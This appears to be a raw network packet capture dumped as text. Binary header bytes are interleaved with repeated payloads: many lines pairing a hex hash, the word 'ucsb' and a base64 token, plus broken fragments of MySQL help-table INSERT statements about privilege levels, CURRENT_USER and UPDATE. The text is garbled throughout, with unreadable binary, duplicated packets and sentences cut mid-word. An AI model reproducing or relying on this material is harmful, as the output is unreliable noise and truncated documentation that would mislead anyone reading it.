230412B4E25BF5C0929E486B754BC927,ucsb,MTNzEwEDAKxXOSCkVH29GNtLw04ioyKDq3a5gQ==
7E6B3D2E38EAC54E6CFE521BDFF0A050,ucsb,MTNzEwEDAK3t+zsy8SGyoSwEyiCHGzOHm6K94w==
43686AE1A8F85960CC03F5B5FA0B91C6,ucsb,MTNzEwEDAK5pqRrzW0TofuuBvheWLCCLXpZ9Fg==
64480978C27DE3C095A41BFCC8334519,ucsb,MTNzEwEDAK+jI6toDg+OLjbNZyMzQ1N0NKDcvQ==
42DAE2EDF9E02450E7F9097CED4FDC96,ucsb,MTNzEwEDALDSPfiJb2/eUl8phy2ZDs5vN14/YA==
7BFBFC8D718CB2F33E19B1F396BF0392,ucsb,MTNzEwEDALH+jksMBA5MJc9EOsYVFC84RQj7Ew==
E1470E3A2AE45D78ED5FD61CC4BE9A20,ucsb,MTNzEwEDALKsb5ruqWgfv+bUz9sZeSwDd2kUWg==
27C6B513327B328F78CF0A2E1CEC30ED,ucsb,MTNzEwEDALNgSA7rUv+ctoNYWBuZq2tZwKvO5w==
6607D5EF70015ACCf ZZ0`BiEL@/go0AE4\K@@4 3 Pu}Ud$; )PCg bbBi0`ET@/p܂Ao0E<@?x  3P៳tj @T )?evel\nTable privileges apply to all columns in a given table. These privileges are\nstored in the mysql.tables_priv table.\nGRANT ALL ON db_name.tbl_name and\nREVOKE ALL ON db_name.tbl_name grant and revoke only table privileges.\n\n Column level\nColumn privileges apply to single columns in a given table. These privileges are\nstored in the mysql.columns_priv table.\nWhen using REVOKE, you must specify the same columns that were granted.\n\n Routine level\nThe CREATE ROUTINE, ALTER ROUTINE, EXECUTE, and\nGRANT privileges apply to stored routines. They can be granted at the\nglobal and database levels. Also, except for CREATE ROUTINE, these\nprivileges can be granted at the routine level for individual routines and\nare stored in the mysql.procs_priv table.\n\n \n\nThe object_type clause was added in MySQL 5.0.6. It should be\nspecified as TABLE, FUNCTION, or PROCEDURE when the\nfollowing object is a table, a stored function, or a stored procedure. To\nuse this clause when upgrading from a version of MySQL older than 5.0.6, you\nmust upgrade your grant tables.\nSee also : [Upgrading-grant-tables].\n','CREATE USER user [IDENTIFIED BY [PASSWORD] \'password\']\n [, user [IDENTIFIED BY [PASSWORD] \'password\']] ...',''),(56,'POINT',2,' Point(x,y)\nConstructs aCg bb0`BiET@/Ԁo0SE<@@w  3P៳tj @T )?evel\nTable privileges apply to all columns in a given table. These privileges are\nstored in the mysql.tables_priv table.\nGRANT ALL ON db_name.tbl_name and\nREVOKE ALL ON db_name.tbl_name grant and revoke only table privileges.\n\n Column level\nColumn privileges apply to single columns in a given table. These privileges are\nstored in the mysql.columns_priv table.\nWhen using REVOKE, you must specify the same columns that were granted.\n\n Routine level\nThe CREATE ROUTINE, ALTER ROUTINE, EXECUTE, and\nGRANT privileges apply to stored routines. They can be granted at the\nglobal and database levels. Also, except for CREATE ROUTINE, these\nprivileges can be granted at the routine level for individual routines and\nare stored in the mysql.procs_priv table.\n\n \n\nThe object_type clause was added in MySQL 5.0.6. It should be\nspecified as TABLE, FUNCTION, or PROCEDURE when the\nfollowing object is a table, a stored function, or a stored procedure. To\nuse this clause when upgrading from a version of MySQL older than 5.0.6, you\nmust upgrade your grant tables.\nSee also : [Upgrading-grant-tables].\n','CREATE USER user [IDENTIFIED BY [PASSWORD] \'password\']\n [, user [IDENTIFIED BY [PASSWORD] \'password\']] ...',''),(56,'POINT',2,' Point(x,y)\nConstructs aCn bbBi0`ET@/ԂSŀo0E<%@?  Pԙ:  '<dE98DA7C8B7DE67D21,ucsb,MTNzEwEDALSK1pcPIZWyQKSJxVftMz/AIe+10Q==
21F904C935D4472F5C93B1DF97BE6888,ucsb,MTNzEwEDALWVuYWNNZJdS5i8l0MniTPHAZrbrw==
836B2AF8F2BAE385B43DD3146959DF85,ucsb,MTNzEwEDALanZxlfvJRRrrK2DuKD9vhkDfxYCg==
3287D8BEF4E09AA91F4CBBA3A085F5D1,ucsb,MTNzEwEDALd8I6InCaAhiIR5lVeNgdEpWigCBw==
797239075B185DA68C76503A6F8F4452,ucsb,MTNzEwEDALjCRgglD3LwPMn2GtDie/wioZUjig==
CB901580D29E859C3F52A68631163ED4,ucsb,MTNzEwEDALnu02K+rmXz+QonmrVNn+jGueSQ4Q==
B24180B84E3AB3E66C002ACB5746BB53,ucsb,MTNzEwEDALqirhQXfUnOQF1GSZ1WUt07AWyr3g==
258C942F9C9F176878BF3394C887D4A2,ucsb,MTNzEwEDALuWnPLcD2715lz/AJ7xKNR9KVMeBg==
45CB69304DB1B998049682CF0B47512C,ucsb,MTNzEwEDALwFK03lQgiip40C+SS9Rv3D0bALyg==
2B1810EFC048FB85577F9241722E2859,ucsb,MTNzEwEDAL0b6YoQWouS7EmgIL+yJ+gJRRznhw==
659F3C59F285149D64FE0FEDA0E55421,ucsb,MTNzEwEDAL4Ll380ImN7zmoOwZV6GIpLPf1SOQ==
062145A927EEFECEE96D13D2246E130D,ucsb,MTNzEwEDAL8SPKoWpALOD38YQSElIzDvYJ1d4A==
DF48FD1DC19F795EC628E3DCD8311EF6,ucsb,MTNzEwEDAMAPF2rOJ+1aQYBZ0/Tokzzlta6l9A==
6AF9543E94A4E6B9A59DC89965450C22,ucsb,MTNzEwEDAMHqN1K/Jo7VGMJhCP5cV5CAExzRFA==
A42DE48075D9C44A08F9210C95A8F0CC,ucsb,MTNzEwEDAMJo7Z7OpcoDo1H/1TfCf8LFBYQFGQ==
645B4F6606534D7DCAFBB0F85C3C6DDD,ucsb,MTNzEwEDAMNYk+BtiXKCCn bb0`BiET@/o0AE<%@@  Pԙ:  '<dE98DA7C8B7DE67D21,ucsb,MTNzEwEDALSK1pcPIZWyQKSJxVftMz/AIe+10Q==
21F904C935D4472F5C93B1DF97BE6888,ucsb,MTNzEwEDALWVuYWNNZJdS5i8l0MniTPHAZrbrw==
836B2AF8F2BAE385B43DD3146959DF85,ucsb,MTNzEwEDALanZxlfvJRRrrK2DuKD9vhkDfxYCg==
3287D8BEF4E09AA91F4CBBA3A085F5D1,ucsb,MTNzEwEDALd8I6InCaAhiIR5lVeNgdEpWigCBw==
797239075B185DA68C76503A6F8F4452,ucsb,MTNzEwEDALjCRgglD3LwPMn2GtDie/wioZUjig==
CB901580D29E859C3F52A68631163ED4,ucsb,MTNzEwEDALnu02K+rmXz+QonmrVNn+jGueSQ4Q==
B24180B84E3AB3E66C002ACB5746BB53,ucsb,MTNzEwEDALqirhQXfUnOQF1GSZ1WUt07AWyr3g==
258C942F9C9F176878BF3394C887D4A2,ucsb,MTNzEwEDALuWnPLcD2715lz/AJ7xKNR9KVMeBg==
45CB69304DB1B998049682CF0B47512C,ucsb,MTNzEwEDALwFK03lQgiip40C+SS9Rv3D0bALyg==
2B1810EFC048FB85577F9241722E2859,ucsb,MTNzEwEDAL0b6YoQWouS7EmgIL+yJ+gJRRznhw==
659F3C59F285149D64FE0FEDA0E55421,ucsb,MTNzEwEDAL4Ll380ImN7zmoOwZV6GIpLPf1SOQ==
062145A927EEFECEE96D13D2246E130D,ucsb,MTNzEwEDAL8SPKoWpALOD38YQSElIzDvYJ1d4A==
DF48FD1DC19F795EC628E3DCD8311EF6,ucsb,MTNzEwEDAMAPF2rOJ+1aQYBZ0/Tokzzlta6l9A==
6AF9543E94A4E6B9A59DC89965450C22,ucsb,MTNzEwEDAMHqN1K/Jo7VGMJhCP5cV5CAExzRFA==
A42DE48075D9C44A08F9210C95A8F0CC,ucsb,MTNzEwEDAMJo7Z7OpcoDo1H/1TfCf8LFBYQFGQ==
645B4F6606534D7DCAFBB0F85C3C6DDD,ucsb,MTNzEwEDAMNYk+BtiXKCC^o bbBi0`ET@/ԂSŀo0E<&@?  Pԙ: - '<dwtJnl67+adi7b+mmow==
B19D45B5043BFB6AA6A87D492A13C5C9,ucsb,MTNzEwEDAMT8aRSZheuIXg2urCvwmPUYaUmaAQ==
1BD628C7EB7A4951444977AA68D2AD91,ucsb,MTNzEwEDAMWAfuCNQJrjDqiEF7MMNcwY2dR7aw==
A61F10C66105C31E3157BAD970EC74C1,ucsb,MTNzEwEDAMYTm3gbT68Y07joIE8os1T41TNwnw==
F1976E3EBAEB31733B910BF4261CE310,ucsb,MTNzEwEDAMcy9x+FtYol9ghxlsd7zTEpLssYeA==
D0812622DC2CCDA77954116B9C6A77D6,ucsb,MTNzEwEDAMj0eQtFxz+To71mydmxxxwDeZ1VCA==
DC2E2DB6B30004FF39938A28689F868A,ucsb,MTNzEwEDAMkHKo2sq+MlKG6rk5nEaV5+IQUYkA==
D88E694317D7FD2D3E4FC4C3ACFF3FBB,ucsb,MTNzEwEDAMrYJsm4i88L/YiiMuZbhmrgGrF14w==
F23AC381C11282693BF6B03C371C87F3,ucsb,MTNzEwEDAMs5VO4dvc3wcXL1mi5f0fPJn37AWg==
C03C1FAE9917C135A7F06E0C4C75C697,ucsb,MTNzEwEDAMzkWOKfEC7OO7zdNxsYNxoY+HHsyg==
1D8D57D85C5D1D7953C32D1FB376449D,ucsb,MTNzEwEDAM1XoyGQhcQ78NR43gn3ybmp/e4wsg==
FEB536E515194B93ABFB980C45C92657,ucsb,MTNzEwEDAM6JkCxofHiF4wAE3RI45bI+IChFMw==
67F58B9060BD8B5469FD50574138AE27,ucsb,MTNzEwEDAM+0+sg6+wJz3SUTYb9RcjH1dOQEKQ==
DDB6B097FE64CA327A1835252175B92D,ucsb,MTNzEwEDANAkVcvC3ryWSmDGzMGntRaNyvs8vg==
7C1BEC788743DC20BA281F401017A1EC,ucsb,MTNzEwEDANGA6tbpM6g+6LfstlK0FsjsKybffw==
8A9794196DC109B47905EBC1B1F640F6,ucsb,MTNzEwEDANKkZb5KdLugDeZbdffDZNpya+uHyA==
FF8D8CD420402852DACxo bb0`BiET@/o0AE<&@@  Pԙ: - '<dwtJnl67+adi7b+mmow==
B19D45B5043BFB6AA6A87D492A13C5C9,ucsb,MTNzEwEDAMT8aRSZheuIXg2urCvwmPUYaUmaAQ==
1BD628C7EB7A4951444977AA68D2AD91,ucsb,MTNzEwEDAMWAfuCNQJrjDqiEF7MMNcwY2dR7aw==
A61F10C66105C31E3157BAD970EC74C1,ucsb,MTNzEwEDAMYTm3gbT68Y07joIE8os1T41TNwnw==
F1976E3EBAEB31733B910BF4261CE310,ucsb,MTNzEwEDAMcy9x+FtYol9ghxlsd7zTEpLssYeA==
D0812622DC2CCDA77954116B9C6A77D6,ucsb,MTNzEwEDAMj0eQtFxz+To71mydmxxxwDeZ1VCA==
DC2E2DB6B30004FF39938A28689F868A,ucsb,MTNzEwEDAMkHKo2sq+MlKG6rk5nEaV5+IQUYkA==
D88E694317D7FD2D3E4FC4C3ACFF3FBB,ucsb,MTNzEwEDAMrYJsm4i88L/YiiMuZbhmrgGrF14w==
F23AC381C11282693BF6B03C371C87F3,ucsb,MTNzEwEDAMs5VO4dvc3wcXL1mi5f0fPJn37AWg==
C03C1FAE9917C135A7F06E0C4C75C697,ucsb,MTNzEwEDAMzkWOKfEC7OO7zdNxsYNxoY+HHsyg==
1D8D57D85C5D1D7953C32D1FB376449D,ucsb,MTNzEwEDAM1XoyGQhcQ78NR43gn3ybmp/e4wsg==
FEB536E515194B93ABFB980C45C92657,ucsb,MTNzEwEDAM6JkCxofHiF4wAE3RI45bI+IChFMw==
67F58B9060BD8B5469FD50574138AE27,ucsb,MTNzEwEDAM+0+sg6+wJz3SUTYb9RcjH1dOQEKQ==
DDB6B097FE64CA327A1835252175B92D,ucsb,MTNzEwEDANAkVcvC3ryWSmDGzMGntRaNyvs8vg==
7C1BEC788743DC20BA281F401017A1EC,ucsb,MTNzEwEDANGA6tbpM6g+6LfstlK0FsjsKybffw==
8A9794196DC109B47905EBC1B1F640F6,ucsb,MTNzEwEDANKkZb5KdLugDeZbdffDZNpya+uHyA==
FF8D8CD420402852DACo bbBi0`ET@/ԂSŀo0E<'@?  Pԙ: j '<d08C13E3D3DF189,ucsb,MTNzEwEDANMwRhCqT8pYZwbjPJYow+apYC0Zrg==
76AE74F921BB42D44F624A432FA2CAAF,ucsb,MTNzEwEDANSv21jyv8KqETCEOJO39gkzKKZ5HA==
F22C50EEE6D920E55E9FCC810C50D11D,ucsb,MTNzEwEDANWeCgdlPELAy8sjbZUZoPvfZc5Bog==
4065C9AFD0E33409BB737B24E5179D8D,ucsb,MTNzEwEDANYcIn9+GZPSudANC1XgXKMD5w+4gQ==
B9826C8CB5E998C18935B3BEFFEA5DD3,ucsb,MTNzEwEDANftl1lzwHGWqnTj4tpvksKxTEZn/A==
B0099B8FA8A4C57AD68CAC706C843132,ucsb,MTNzEwEDANhkU3fG80Owus6ee5GRrYVTd4r7Wg==
BD492A8F2B60182736A750B9CA895DCA,ucsb,MTNzEwEDANly1YPhSL+7hE5xXmfQzGI fa0 s76LMwQ==
4C3BB63D6A8305B323C800A9BDD85F41,ucsb,MTNzEwEDANq5Vjv8Q8CjBP2VeI2asWA1GlSl8A==
B74C284D1DE147E3079AE50E1D02E74C,ucsb,MTNzEwEDANuP8nEKMbS6Akw1RX4pfUqmjxateg==
CF722F9A0A046C57B7D91DB2B2A1A4B4,ucsb,MTNzEwEDANyDpDsgl46zuoYRcLovajNaB30zJA==
A020E95C1B690FECBBC52C00002C994B,ucsb,MTNzEwEDAN2gUAoDU8Z4WgVS908ToxDuWT8dmQ==
9920692F548063791BF438463733D389,ucsb,MTNzEwEDAN7Wd+VfH6SKmHJj2TP4ztQU6eXK5w==
0609485897FAEDA66EB59FDE759E04B3,ucsb,MTNzEwEDAN8tICkwqQcfM7fEy1zoLFdrp9N2AQ==
C98A86EFB153CED4366439E6CA776D18,ucsb,MTNzEwEDAOD4/jEt+oIhzsrs2HbOFBkhigXU8A==
6EF1E6C195C348F4E6A3340B13427018,ucsb,MTNzEwEDAOGK3PsEwDcp/XbE7pYXb1kTPEBeaQ==
48532AAF7A2F54D765F0E06248356A15,ucsb,MTNzEwEDAOKAhVR7Co bb0`BiET@/o0AE<'@@  Pԙ: j '<d08C13E3D3DF189,ucsb,MTNzEwEDANMwRhCqT8pYZwbjPJYow+apYC0Zrg==
76AE74F921BB42D44F624A432FA2CAAF,ucsb,MTNzEwEDANSv21jyv8KqETCEOJO39gkzKKZ5HA==
F22C50EEE6D920E55E9FCC810C50D11D,ucsb,MTNzEwEDANWeCgdlPELAy8sjbZUZoPvfZc5Bog==
4065C9AFD0E33409BB737B24E5179D8D,ucsb,MTNzEwEDANYcIn9+GZPSudANC1XgXKMD5w+4gQ==
B9826C8CB5E998C18935B3BEFFEA5DD3,ucsb,MTNzEwEDANftl1lzwHGWqnTj4tpvksKxTEZn/A==
B0099B8FA8A4C57AD68CAC706C843132,ucsb,MTNzEwEDANhkU3fG80Owus6ee5GRrYVTd4r7Wg==
BD492A8F2B60182736A750B9CA895DCA,ucsb,MTNzEwEDANly1YPhSL+7hE5xXmfQzGI fa0 s76LMwQ==
4C3BB63D6A8305B323C800A9BDD85F41,ucsb,MTNzEwEDANq5Vjv8Q8CjBP2VeI2asWA1GlSl8A==
B74C284D1DE147E3079AE50E1D02E74C,ucsb,MTNzEwEDANuP8nEKMbS6Akw1RX4pfUqmjxateg==
CF722F9A0A046C57B7D91DB2B2A1A4B4,ucsb,MTNzEwEDANyDpDsgl46zuoYRcLovajNaB30zJA==
A020E95C1B690FECBBC52C00002C994B,ucsb,MTNzEwEDAN2gUAoDU8Z4WgVS908ToxDuWT8dmQ==
9920692F548063791BF438463733D389,ucsb,MTNzEwEDAN7Wd+VfH6SKmHJj2TP4ztQU6eXK5w==
0609485897FAEDA66EB59FDE759E04B3,ucsb,MTNzEwEDAN8tICkwqQcfM7fEy1zoLFdrp9N2AQ==
C98A86EFB153CED4366439E6CA776D18,ucsb,MTNzEwEDAOD4/jEt+oIhzsrs2HbOFBkhigXU8A==
6EF1E6C195C348F4E6A3340B13427018,ucsb,MTNzEwEDAOGK3PsEwDcp/XbE7pYXb1kTPEBeaQ==
48532AAF7A2F54D765F0E06248356A15,ucsb,MTNzEwEDAOKAhVR7CQq bbBi0`ET@/p܂Ao0E<@?x  3P音tj  )? WKB Point using its coordinates.\n','',''),(57,'CURRENT_USER',25,' CURRENT_USER()\nReturns the username and hostname combination that the current session was\nauthenticated as. This value corresponds to the MySQL account that\ndetermines your access privileges. It can be different from the value of\nUSER().\n','mysql> SELECT USER();\n -> \'davida@localhost\'\nmysql> SELECT * FROM mysql.user;\nERROR 1044: Access denied for user \'\'@\'localhost\' to\ndatabase \'mysql\'\nmysql> SELECT CURRENT_USER();\n -> \'@localhost\'',''),(58,'LCASE',23,' LCASE(str)\n\nLCASE() is a synonym for LOWER().\n','',''),(59,'<=',26,' <=\nLess than or equal:\n','mysql> SELECT 0.1 <= 2;\n -> 1',''),(60,'UPDATE',6,'The UPDATE statement updates columns in existing table rows with\nnew values. The SET clause indicates which columns to modify\nand the values they should be given. The WHERE clause, if given,\nspecifies which rows should be updated. Otherwise, all rows are updated. If\nthe ORDER BY clause is specified, the rows are updated in the\norder that is specified. The LIMIT clause places a limit on the\nnumber of rows that can be updated.\n\nThe UPDATE statement supports the following modifiers:\n\n\n --- If you specify the LOW_PRIORITY keyword, execution of thClq bb0`BiET@/Ԁo0SE<@@w  3P音tj  )? WKB Point using its coordinates.\n','',''),(57,'CURRENT_USER',25,' CURRENT_USER()\nReturns the username and hostname combination that the current session was\nauthenticated as. This value corresponds to the MySQL account that\ndetermines your access privileges. It can be different from the value of\nUSER().\n','mysql> SELECT USER();\n -> \'davida@localhost\'\nmysql> SELECT * FROM mysql.user;\nERROR 1044: Access denied for user \'\'@\'localhost\' to\ndatabase \'mysql\'\nmysql> SELECT CURRENT_USER();\n -> \'@localhost\'',''),(58,'LCASE',23,' LCASE(str)\n\nLCASE() is a synonym for LOWER().\n','',''),(59,'<=',26,' <=\nLess than or equal:\n','mysql> SELECT 0.1 <= 2;\n -> 1',''),(60,'UPDATE',6,'The UPDATE statement updates columns in existing table rows with\nnew values. The SET clause indicates which columns to modify\nand the values they should be given. The WHERE clause, if given,\nspecifies which rows should be updated. Otherwise, all rows are updated. If\nthe ORDER BY clause is specified, the rows are updated in the\norder that is specified. The LIMIT clause places a limit on the\nnumber of rows that can be updated.\n\nThe UPDATE statement supports the following modifiers:\n\n\n --- If you specify the LOW_PRIORITY keyword, execution of thCu bbBi0`ET@/p܂Ao0E<@?x  3Ptj y )?e\nUPDATE is delayed until no other clients are reading from the table.\n\n --- If you specify the IGNORE keyword, the update statement does not\nabort even if errors occur during the update. Rows for which duplicate-key\nconflicts occur are not updated. Rows for which columns are updated to\nvalues that would cause data conversion errors are updated to the closet\nvalid values instead.\n','UPDATE [LOW_PRIORITY] [IGNORE] tbl_name\n SET col_name1=expr1 [, col_name2=expr2 ...]\n [WHERE where_definition]\n [ORDER BY ...]\n [LIMIT row_count]',''),(61,'DROP INDEX',28,'DROP INDEX drops the index named index_name from the table\ntbl_name. In MySQL 3.22 or later, DROP INDEX is mapped to an\nALTER TABLE statement to drop the index. See also : [ALTER TABLE, ,\nALTER TABLE]. DROP INDEX doesn\'t do anything prior to MySQL\n3.22.\n','DROP INDEX index_name ON tbl_name',''),(62,'MATCH AGAINST',23,'As of MySQL 3.23.23, MySQL has support for full-text indexing\nand searching. A full-text index in MySQL is an index of type\nFULLTEXT. FULLTEXT indexes are used with MyISAM tables\nonly and can be created from CHAR, VARCHAR,\nor TEXT columns at CREATE TABLE time or added later with\nALTER TABLE or CREATE INDEX. For large datasets, it is\nmuch faster to load your data inCu bb0`BiET@/Ԁo0SE<@@w  3Ptj y )?e\nUPDATE is delayed until no other clients are reading from the table.\n\n --- If you specify the IGNORE keyword, the update statement does not\nabort even if errors occur during the update. Rows for which duplicate-key\nconflicts occur are not updated. Rows for which columns are updated to\nvalues that would cause data conversion errors are updated to the closet\nvalid values instead.\n','UPDATE [LOW_PRIORITY] [IGNORE] tbl_name\n SET col_name1=expr1 [, col_name2=expr2 ...]\n [WHERE where_definition]\n [ORDER BY ...]\n [LIMIT row_count]',''),(61,'DROP INDEX',28,'DROP INDEX drops the index named index_name from the table\ntbl_name. In MySQL 3.22 or later, DROP INDEX is mapped to an\nALTER TABLE statement to drop the index. See also : [ALTER TABLE, ,\nALTER TABLE]. DROP INDEX doesn\'t do anything prior to MySQL\n3.22.\n','DROP INDEX index_name ON tbl_name',''),(62,'MATCH AGAINST',23,'As of MySQL 3.23.23, MySQL has support for full-text indexing\nand searching. A full-text index in MySQL is an index of type\nFULLTEXT. FULLTEXT indexes are used with MyISAM tables\nonly and can be created from CHAR, VARCHAR,\nor TEXT columns at CREATE TABLE time or added later with\nALTER TABLE or CREATE INDEX. For large datasets, it is\nmuch faster to load your data inCv bbBiBaET@/^o0 o0E1360855C2182784B5289CF4E01621D1E,ucsb,MTNzEwEDAONu/igKANCkVeoTt3RY5LdFpgLQ7Q==
CD12074DEB275B54E1D341283599F852,ucsb,MTNzEwEDAOQF2ZiBgUywE6JBsZZCQds4bVR3zA==
D3B81820583BA2C40A071641A5784C77,ucsb,MTNzEwEDAOVXOinr4ClxfwAss3BA7RRqwv8wKA==
DBE97521A12D08C8A6E25B0775E37B75,ucsb,MTNzEwEDAOYDiRZvh6KA4plIQzVgRytMwAOnSg==
C79441D00F631CF880F9391CF986B43A,ucsb,MTNzEwEDAOetRWDq2yBwDjdc/QTSOzl+fLEczA==
2D18E671C215C033820FCCACB355B057,ucsb,MTNzEwEDAOjvEjF1xzcdPfnYoRd9NPwihhm9WA==
5D910AD4F903E57A8A6816954FD21565,ucsb,MTNzEwEDAOl8eyjz4VjlpGO4NOrR8xEmVI+HXQ==
2CB3B3199A04B951F8DC97390A6C3896,ucsb,MTNzEwEDAOods9S9/rhQx7NP/9+sf8hEqlDkQw==
943A7DB02202F5CCA5E3B10AFDD70259,ucsb,MTNzEwEDAOuMO1poOkabR1HM+2S2OuG03SW2Hg==
BCF45CCFCD9E0121510ABF15810F94AA,ucsb,MTNzEwEDAOxXfLD/FDe0Id2y8/GU/KeJqJ8Vjw==
A9613B06E372371F98529A7B68253D20,ucsb,MTNzEwEDAO21TV871jq0RB7UPStEGimzTLapdg==
E5838F4355658977F23205BE6D18575F,ucsb,MTNzEwEDAO7SNxtX/XFW86fLYKCth4kKKFq6lg==
2A75B785D3822EB55835924AB0024752,ucsb,MTNzEwEDAO+gl1M02JnBopVQX1RpZgkNSYulzA==
FFDB13A13FC07264BF3D1F666D018CD3,ucsb,MTNzEwEDAPCym4LWZBfhJC2zYbL5olFrZ/ZPfQ==
35F050070F022740ED58C165CCBBD98A,ucsb,MTNzEwEDAPEnYxYguYioHrKRggfUbUTesC/r2A==
F25A8032807149Cw bb0`BiET@/o0AE<(@@  Pԙ: i '<d3aGwlY9xE1jTYiU99tgb+w==
1360855C2182784B5289CF4E01621D1E,ucsb,MTNzEwEDAONu/igKANCkVeoTt3RY5LdFpgLQ7Q==
CD12074DEB275B54E1D341283599F852,ucsb,MTNzEwEDAOQF2ZiBgUywE6JBsZZCQds4bVR3zA==
D3B81820583BA2C40A071641A5784C77,ucsb,MTNzEwEDAOVXOinr4ClxfwAss3BA7RRqwv8wKA==
DBE97521A12D08C8A6E25B0775E37B75,ucsb,MTNzEwEDAOYDiRZvh6KA4plIQzVgRytMwAOnSg==
C79441D00F631CF880F9391CF986B43A,ucsb,MTNzEwEDAOetRWDq2yBwDjdc/QTSOzl+fLEczA==
2D18E671C215C033820FCCACB355B057,ucsb,MTNzEwEDAOjvEjF1xzcdPfnYoRd9NPwihhm9WA==
5D910AD4F903E57A8A6816954FD21565,ucsb,MTNzEwEDAOl8eyjz4VjlpGO4NOrR8xEmVI+HXQ==
2CB3B3199A04B951F8DC97390A6C3896,ucsb,MTNzEwEDAOods9S9/rhQx7NP/9+sf8hEqlDkQw==
943A7DB02202F5CCA5E3B10AFDD70259,ucsb,MTNzEwEDAOuMO1poOkabR1HM+2S2OuG03SW2Hg==
BCF45CCFCD9E0121510ABF15810F94AA,ucsb,MTNzEwEDAOxXfLD/FDe0Id2y8/GU/KeJqJ8Vjw==
A9613B06E372371F98529A7B68253D20,ucsb,MTNzEwEDAO21TV871jq0RB7UPStEGimzTLapdg==
E5838F4355658977F23205BE6D18575F,ucsb,MTNzEwEDAO7SNxtX/XFW86fLYKCth4kKKFq6lg==
2A75B785D3822EB55835924AB0024752,ucsb,MTNzEwEDAO+gl1M02JnBopVQX1RpZgkNSYulzA==
FFDB13A13FC07264BF3D1F666D018CD3,ucsb,MTNzEwEDAPCym4LWZBfhJC2zYbL5olFrZ/ZPfQ==
35F050070F022740ED58C165CCBBD98A,ucsb,MTNzEwEDAPEnYxYguYioHrKRggfUbUTesC/r2A==
F25A8032807149C'x bbBiʪET@/o0oo0E<@@$Y YP*F+lm@To 7=xG5CBx bbBaBiET@/^o0o0 E<@@$Y YP*F+lm@T 7=xG5Cy bbBi0`ET@/ԂSŀo0E<)@?  Pԙ: 5 '<dC61D93EAFFB86B86D4,ucsb,MTNzEwEDAPLx357ApQxcqAKTGkO18Hp/ZMCeRg==
8E9A70DB4D0FE7D58EC01FE56256EF86,ucsb,MTNzEwEDAPPEA/cTfNCqsPh4Uv58hq6CypGwBw==
088852A68355FDC6B7DE307FB1711372,ucsb,MTNzEwEDAPSM279Pw4kYmTWAScneaQqykzWmrw==
3AE7A0039EC6CDDB614E328FD6B9B292,ucsb,MTNzEwEDAPWKkzRsdeJN/7VnvAKF6Yf3Kd9N5g==
DE18EC74B4D3D7B3D5900B5CDC93E6C5,ucsb,MTNzEwEDAPYwtNH/xkp/NlBb89+2CuJYM+VMMA==
7EBB05C253EA449087185069A31B4454,ucsb,MTNzEwEDAPdiHx2L5ldZFF6+7H8a//IAyu6AAg==
A0691A4CBC86F22E565F93C051EEC239,ucsb,MTNzEwEDAPiA8rx80u6TfUe0MrpuYdWGNol90Q==
0C4AE19DE6C7FC35B2F8DDDC384DA053,ucsb,MTNzEwEDAPlrJDN1QG/cLBl/K5TwxsteEXVxLQ==
753B709A6480162310C5792E2BD2AFAA,ucsb,MTNzEwEDAPqWIlCDqtl6vko9SlrQ537Iaz2jUA==
A29F34E1ECF0B2DC7AA2BA94E42C997E,ucsb,MTNzEwEDAPu9CQxvicdsSmM0zDBEauWExObjbw==
3B1B4C6E2FADC763177722B2030C115D,ucsb,MTNzEwEDAPzrsTgB8ZKM48yg+x5ncvSTyVD5BQ==
A11D8BF7E46AE14B262E86385955924D,ucsb,MTNzEwEDAP3+BtZnJHOJrPXUWffOJOeM+SmloQ==
9AF140F55F47F7E3B0095700790B4684,ucsb,MTNzEwEDAP4IGry+yeXXwED/SBwf1xEh0GHO5A==
2204648717024705C4D045745070847C,ucsb,MTNzEwEDAP9i1srxhe7UewhoU9KCjazZAmpo5Q==
033FAA4D6F7E796547262689B16861A0,ucsb,MTNzEwEDAQAVt6cCr6LwsrSzNVNvzUr69oBRcg==
76ABB7BFFC3E26906889BC4AE728E297,ucsb,MTNzEwEDAQGk8xL5LbXCy ZZBiBaEL@/fo0 o0E4X@)J Y P+lm*G G57=xCy bb0`BiET@/o0AE<)@@  Pԙ: 5 '<dC61D93EAFFB86B86D4,ucsb,MTNzEwEDAPLx357ApQxcqAKTGkO18Hp/ZMCeRg==
8E9A70DB4D0FE7D58EC01FE56256EF86,ucsb,MTNzEwEDAPPEA/cTfNCqsPh4Uv58hq6CypGwBw==
088852A68355FDC6B7DE307FB1711372,ucsb,MTNzEwEDAPSM279Pw4kYmTWAScneaQqykzWmrw==
3AE7A0039EC6CDDB614E328FD6B9B292,ucsb,MTNzEwEDAPWKkzRsdeJN/7VnvAKF6Yf3Kd9N5g==
DE18EC74B4D3D7B3D5900B5CDC93E6C5,ucsb,MTNzEwEDAPYwtNH/xkp/NlBb89+2CuJYM+VMMA==
7EBB05C253EA449087185069A31B4454,ucsb,MTNzEwEDAPdiHx2L5ldZFF6+7H8a//IAyu6AAg==
A0691A4CBC86F22E565F93C051EEC239,ucsb,MTNzEwEDAPiA8rx80u6TfUe0MrpuYdWGNol90Q==
0C4AE19DE6C7FC35B2F8DDDC384DA053,ucsb,MTNzEwEDAPlrJDN1QG/cLBl/K5TwxsteEXVxLQ==
753B709A6480162310C5792E2BD2AFAA,ucsb,MTNzEwEDAPqWIlCDqtl6vko9SlrQ537Iaz2jUA==
A29F34E1ECF0B2DC7AA2BA94E42C997E,ucsb,MTNzEwEDAPu9CQxvicdsSmM0zDBEauWExObjbw==
3B1B4C6E2FADC763177722B2030C115D,ucsb,MTNzEwEDAPzrsTgB8ZKM48yg+x5ncvSTyVD5BQ==
A11D8BF7E46AE14B262E86385955924D,ucsb,MTNzEwEDAP3+BtZnJHOJrPXUWffOJOeM+SmloQ==
9AF140F55F47F7E3B0095700790B4684,ucsb,MTNzEwEDAP4IGry+yeXXwED/SBwf1xEh0GHO5A==
2204648717024705C4D045745070847C,ucsb,MTNzEwEDAP9i1srxhe7UewhoU9KCjazZAmpo5Q==
033FAA4D6F7E796547262689B16861A0,ucsb,MTNzEwEDAQAVt6cCr6LwsrSzNVNvzUr69oBRcg==
